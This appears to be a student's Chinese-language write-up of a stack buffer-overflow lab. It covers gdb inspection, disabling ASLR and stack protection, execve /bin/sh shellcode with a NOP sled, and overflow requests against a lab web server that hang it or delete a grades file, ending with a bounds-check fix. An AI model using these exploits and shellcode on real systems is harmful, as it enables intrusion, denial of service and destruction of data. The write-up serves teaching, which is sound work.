#Exercise 1:   添加printf代码即可,注意地址需要用%p,编译并运行程序三次,可以得出三次地址各不相同。

void badman()
{
    printf("I am the bad man\n");
    return;
}
int func(char *str)
{
  int variable_a;
  char buffer[12];
  printf("%p\n",buffer);
  strcpy(buffer, str);
  
  return 1;
}
int main(int argc, char **argv)
{
  char *buf = "hello\n";
  
  if(argc > 1){
    buf = argv[1];
  }

  func(buf);
  printf("Returned Properly\n");
  return 1;
}

使用如下命令输出结果

./stack1 >> address.txt
./stack1 >> address.txt
./stack1 >> address.txt
查看结果
cat address.txt

#Exercise2:

  基本的gdb调试指令:   b设置断点,这里在func入口处设置断点,   r开始运行,可以看到程序会在func入口处停止运行;   info r用于显示各寄存器的值     i r $ebp或者p $esp显示寄存器ebp的值,即当前函数值的栈底指针;   x/… addr指令用于取addr所存的值,可以指定输出形式,如x/4wx是以x(hex)形式从指定地址往后打印4个w(4字节一组),还有诸如x/bx,x/10i,x/2s等格式;   disassemble func显示func函数对应的汇编指令以及指令在内存中的地址;   可以用p打印变量信息,如p badman打印badman函数的入口地址;   set命令可以设置变量,地址等的值。 #Exercise3:

  关闭ASLR,即地址空间随机化机制:

  在终端运行sudo sysctl -w kernel.randomize_va_space=0,将其设为0即可(或者sudo -i进入root权限下echo 0 >/proc/sys/kernel/randomize_va_space),查看是否成功cat /proc/sys/kernel/randomize_va_space然后我们再运行三次stack1.c,如下图所示,可以看到buffer的地址是相同的。 # Exercise4:

  我们需要关闭栈保护机制,否则系统禁止我们访问,关闭保护:

  gcc -g -z execstack -fno-stack-protector -o stack1 stack1.c

  在stack1.c中设置了两个断点,分别在主函数调用func函数的地方和func函数入口处。通过如图一步步的调试,打印出func函数入口地址、主函数调用处地址、eip、esp、buffer等,我们可以看出eip是每次程序执行的下次地址,一直在变,esp是栈顶值,在调用func函数之前或者之后都是某个定值,但是由于我们在传入的字符串的个数很多,strcpy函数在复制给buffer的时候把地址0xbffff220的esp给覆盖了,而我传入的字符串从图中可以看出是”hello”其中’o’重复了51,所以最后打印出地址0xbffff220的值是0x6f6f6f6f,6f是’o’的ascii码值,导致程序在结束func函数时无法正常返回主函数。 #Exercise5:   实验过程如图所示,地址0xffffd82c存储的是main函数的入口地址值,当改成0x0804842b之后,这个值是函数badman的入口值,所以得到了执行,但是由于本当执行主函数的改成执行了未知的函数,所以出现了段错误,只需要在修改之后再加上set *0x8048414=0x8048571,地址值可行就不会出现错误。 #Exercise6:   实验过程如图所示,取得了控制权。

gcc -g -z execstack -fno-stack-protector -o stack2 stack2.c
代码:
char shellcode[]=
  "\x31\xc0" 
  "\x50" 
  "\x68""//sh" 
  "\x68""/bin" 
  "\x89\xe3" 
  "\x50" 
  "\x53" 
  "\x89\xe1" 
  "\x99"
  "\xb0\x0b" 
  "\xcd\x80" ;
// size = 24

int func(char *str)
{
  char buffer[128];
  /* fill code in here:
   */

  strcpy(buffer, str);
  
  return 1;
}

int main(int argc, char**argv)
{
  char buffer[1024];

  /* Construct an attack shellcode to pop a shell.
   * You should put your shellcode into the "buffer" array, and
   * pass the "buffer" to the function "func".
   * Your code here:
   */  
  int addr = (int)(buffer-140);/
  int *ptr = (int*)buffer;
  int i;

  for(i=0;i<1024;i+=4){
    *ptr = addr;
    ptr++;
  }

  char *nop_ptr = buffer;
  for(i=0;i<128/2;++i)
    *(nop_ptr++) = 0x90;

  nop_ptr = buffer+(128/2-strlen(shellcode)/2);
  for(i=0;i<strlen(shellcode);++i)
    *(nop_ptr++) = shellcode[i];

  func(buffer);
  printf("Returned Properly\n");
  return 1;
}

#Exercise7:   找到两个漏洞,主要在以下代码中:   getToken函数对’ ‘和’\r\n’以外字符直接进行存储,并且都不经过数组边界检查,所以s数组是很容易溢出的,而且当遇到’\r’时,如果后面没有’\n’,输入的字符也会被一概存入s;   s数组溢出之后不仅可以修改return address从而改变程序执行流,而且可以修改参数fd,比如我们可以将其改为0,那么当getToken再调用getChar时,read函数会去标准输入读取字符,这样就可以使客户端浏览器处于”死等“状态。 #Exercise8:   对于以上找到的漏洞,在browser.c中添加请求字符串,达到crash sever的目的,效果是客户端一直处于等待response的状态。   攻击的关键在于找到返回地址所在的地址,我们可以用gdb调试的方法找到这个地址,也可以在parse.c中输出s和fd的地址,那么ret就在&fd这个地址,这里之所以还要找到s的地址是因为,返回地址的下一个字存放的是fd,我们如果改变了fd,那么调用getChar时,read函数不再是去客户端socket读取值,而是根据文件描述符fd去其它文件读了。

  编写一个无限循环的shellcode,如   while(1);

  编译后用objdump可以查看其机器码,我们可以看到是eb fe,我们将NOP,shellcode,addr分别填入大小为&fd-s的数组,

  还有一个关键处是我们还要在数组最后加一个’ ‘,这是getToken函数的出口之一,另一个是’\r\n’.

  将shellcode代码存入缓冲区,在最后一个字节填入’ ‘,具体的代码如下:

char req[1065];
  int i;
  for(i=0;i<1064;++i)
    req[i] = 0;
  for(i=0;i<strlen(shellcode);++i)
    req[i] = shellcode[i];
  *((int*)(req+1060)) = 0xbffff9e8;//该地址为getToken的s数组地址
  req[1064] = ' ';
  write(sock_client,req,1065);

 2.根据找到的另一漏洞,我们可以不用shellcode,达到同样的效果,就是将fd的内容改为0,让read函数等待标准输入,代码如下:

char req[1069];
  int i;
  for(i=0;i<1068;++i)
    req[i] = 0;
  req[1068] = ' ';
  write(sock_client,req,1069);

#Exercise9:

  先研究了create-shell.c文件中汇编指令之如何实现删除一个文件的,后来发现只需要把文件路径转化成十六进制的ascii码值,然后压栈,就可以完成删除工作,那么写了个小程序ascii.c把自己想要删除的文件路径转化成十六进制数据,然后写入create-shell.c文件中然后生成了shellcode,在放入test-shell.c文件中测试,发现成功啦!然后在写入shellcode进行攻击,终于攻击服务器成功了。

ascii.c代码:
int main()
{
    char s[] = "0/home/seed/security/lab1-code/grades.txt";
    int i = 40;
    for(;i>-1;i--)
    {
       if(!(i%4))
          printf("\n");
       printf("%x",s[i]);
    }
    return 0;
}
create_shellcode.c代码:
__asm__(".globl mystart\n" 
	  "mystart:\n"
	  
	  "xor    %eax,%eax\n"
	  "push   %eax\n"    
	  "push   $0x7478742e\n"    
	  "push   $0x73656461\n"    
	  "push   $0x72672f65\n"    
	  "push   $0x646f632d\n"    
	  "push   $0x3162616c\n"    
	  "push   $0x2f797469\n"    
	  "push   $0x72756365\n"    
	  "push   $0x732f6465\n"    
	  "push   $0x65732f65\n"    
	  "push   $0x6d6f682f\n"    
	  "mov    %esp,%ebx\n"      
	  "mov    $0xa,%al\n"
	  "int    $0x80\n"
	  "xor	%ebx,%ebx\n"
	  "mov    $0x1,%al\n"
	  "int    $0x80\n"
	  ".globl end\n"
	  "end:\n"
	  "leave\n"
	  "ret\n"
	  );
创建你的文件文件,运行./broswer程序之后,可以发现文件被成功删除。  
char req[1065];
  long *ptr,*addr_ptr;
  addr_ptr = (long*)0xbffff9f8;
  int i;
  ptr = (long*)req;
  for(i=0;i<1064;i+=4)
    *(ptr++) = addr_ptr;

  for(i=0;i<1024/2;++i) 
    req[i] = 0x90;

  char *pptr = req+1024/2-strlen(shellcode)/2;
  for(i=0;i<strlen(shellcode);++i)
    *(pptr++) = shellcode[i];
  req[1064] = ' ';
  write(sock_client,req,1065);

#Exercise10:   s数组写入时检查i的大小是否小于1024,如果小于1024,则可以写入,否则不予写入。